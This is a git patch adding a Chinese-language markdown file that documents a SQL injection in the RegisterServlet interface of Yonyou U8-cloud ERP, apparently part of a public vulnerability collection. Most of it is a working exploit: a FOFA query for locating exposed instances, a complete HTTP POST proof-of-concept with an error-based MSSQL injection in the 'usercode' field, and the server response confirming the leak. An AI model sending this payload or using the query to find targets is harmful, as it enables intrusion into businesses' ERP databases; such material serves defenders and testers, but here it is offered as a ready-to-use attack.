From 5858755332a455c207ad2e79b5bf4bd56947f05d Mon Sep 17 00:00:00 2001
From: wy876 <139549762+wy876@users.noreply.github.com>
Date: Sun, 19 Nov 2023 12:25:04 +0800
Subject: [PATCH] =?UTF-8?q?Create=20=E7=94=A8=E5=8F=8BU8-cloud=20RegisterS?=
 =?UTF-8?q?ervlet=E6=8E=A5=E5=8F=A3=E5=AD=98=E5=9C=A8SQL=E6=B3=A8=E5=85=A5?=
 =?UTF-8?q?=E6=BC=8F=E6=B4=9E.md?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 ...-cloud RegisterServlet接口存在SQL注入漏洞.md | 38 +++++++++++++++++++
 1 file changed, 38 insertions(+)
 create mode 100644 用友U8-cloud RegisterServlet接口存在SQL注入漏洞.md

diff --git a/用友U8-cloud RegisterServlet接口存在SQL注入漏洞.md b/用友U8-cloud RegisterServlet接口存在SQL注入漏洞.md
new file mode 100644
index 0000000..4e8a728
--- /dev/null
+++ b/用友U8-cloud RegisterServlet接口存在SQL注入漏洞.md	
@@ -0,0 +1,38 @@
+## 用友U8-cloud RegisterServlet接口存在SQL注入漏洞
+U8 Cloud是用友公司推出的企业上云数字化平台，为成长型和创新型企业提供全面的云ERP解决方案。
+
+U8 cloud不同于传统的ERP，融合了交易、服务、管理于一体的整体解决方案。U8 cloud集中于企业内部管理管控，管理，规范、高效、协同、透明。通过云模式，低成本，快速部署，即租即用的帮助企业免除硬软件投入的快速搭建企业管理架构。通过云服务连接，业务模式、服务模式的经营创新。
+
+该系统RegisterServlet接口存在SQL注入漏洞，并且属于1day状态。
+
+## fofa
+```
+app="用友-U8-Cloud"
+```
+
+## poc
+发送下面的poc，响应包返回123456 的md5为存在漏洞
+```
+POST /servlet/RegisterServlet HTTP/1.1
+Host: ip:port
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
+Connection: close
+Content-Length: 85
+Accept: */*
+Accept-Language: en
+Content-Type: application/x-www-form-urlencoded
+X-Forwarded-For: 127.0.0.1
+Accept-Encoding: gzip
+
+usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--
+```
+返回
+```
+HTTP/1.1 200 OK
+Connection: close
+Content-Length: 71Date: Mon, 13 Nov 2023 02:25:54 GMT
+Server: Apache-Coyote/1.1
+Set-Cookie: JSESSIONID=F66A9268A74114BADA7CB11346378B11.server;
+Path=/; HttpOnly
+Error:?? nvarchar ? 'e10adc3949ba59abbe56e057f20f883e' ??????? int ????
+```